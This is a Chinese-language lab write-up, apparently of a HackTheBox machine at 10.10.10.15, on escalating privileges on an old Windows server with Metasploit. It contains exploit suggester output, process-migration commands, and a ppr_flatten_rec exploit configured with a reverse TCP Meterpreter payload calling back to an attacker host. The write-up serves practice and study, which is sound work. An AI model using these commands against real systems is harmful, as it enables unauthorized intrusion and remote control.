Administrator ASPNET Guest
IUSR_GRANPA IWAM_GRANPA Lakis
SUPPORT_388945a0
The command completed successfully.

## 尝试提权
#### exp提权
依次尝试suggerser提示的exp，全部失败

[+] 10.10.10.15 - exploit/windows/local/ms10_015_kitrap0d: The target service is running, but could not be validated.
[+] 10.10.10.15 - exploit/windows/local/ms14_058_track_popup_menu: The target appears to be vulnerable.
[+] 10.10.10.15 - exploit/windows/local/ms14_070_tcpip_ioctl: The target appears to be vulnerable.
[+] 10.10.10.15 - exploit/windows/local/ms15_051_client_copy_image: The target appears to be vulnerable.
[+] 10.10.10.15 - exploit/windows/local/ms16_016_webdav: The target service is running, but could not be validated.
[+] 10.10.10.15 - exploit/windows/local/ms16_032: The target service is running, but could not be validated.
[+] 10.10.10.15 - exploit/windows/local/ms16_032_secondary_logon_handle_privesc: The target service is running, but could not be validated.
[+] 10.10.10.15 - exploit/windows/local/ppr_flatten_rec: The target appears to be vulnerable.
[*] Post module execution completed

![](4.PNG)

## writeup
之前使用`getuid`命令，但是结果报错，还以为是权限不够。

msf进程存在于内存之中，以下命令将进程迁移为稳定进程，再使用`getuid`命令，就不会报错了。

background
use post/windows/manage/migrate
set SESSION 1
run

use exploit/windows/local/ppr_flatten_rec
set payload windows/meterpreter/reverse_tcp
set LHOST 10.10.14.7
set LPORT 8899
set SESSION 1

## 总结

失败的提示

[] Started reverse TCP handler on 10.10.14.7:8899
[] Launching notepad to host the exploit…
[+] Process 208 launched.
[] Reflectively injecting the exploit DLL into 208…
[] Injecting exploit into 208 …
[] Exploit injected. Injecting payload into 208…
[] Payload injected. Executing exploit…
[] Exploit thread executing (can take a while to run), waiting 30 sec …
[] Exploit completed, but no session was created.

waiting 30 sec，当看到这个提示，于是执行失败以后，输入以下命令。

set wait 20
```